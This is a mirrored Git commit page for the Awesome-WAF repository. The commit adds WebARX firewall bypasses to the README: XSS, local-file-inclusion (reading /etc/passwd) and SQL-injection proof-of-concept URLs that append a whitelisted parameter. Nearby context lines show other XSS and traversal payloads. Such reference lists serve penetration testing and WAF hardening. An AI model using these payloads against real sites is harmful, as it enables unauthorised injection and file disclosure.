mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2025-01-03 13:30:03 +07:00
Code Issues Packages Projects Releases Wiki Activity

Added update for more webarx bypasses

Browse Source
This commit is contained in:
Pinaki Mondal 2019-10-13 22:05:31 +05:30 committed by GitHub
parent 7633b56a0e
commit de0c17045f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
README.md
View File

@ -3707,6 +3707,20 @@ http://host.com/test.asp?file=.%./bla.txt
``` ```
<a69/onauxclick=open&#40&#41>rightclickhere <a69/onauxclick=open&#40&#41>rightclickhere
``` ```
- [Bypassing All Protections Using A Whitelist String](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/) by [@Osanda Malith](https://twitter.com/OsandaMalith)
- XSS PoC
```
http://host.com/?vulnparam=<script>alert()</script>&ithemes-sync-request
```
- LFI PoC
```
http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request
```
- SQLi PoC
```
http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request
```
### WebKnight ### WebKnight
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/) - Cross Site Scripting by [@WAFNinja](https://waf.ninja/)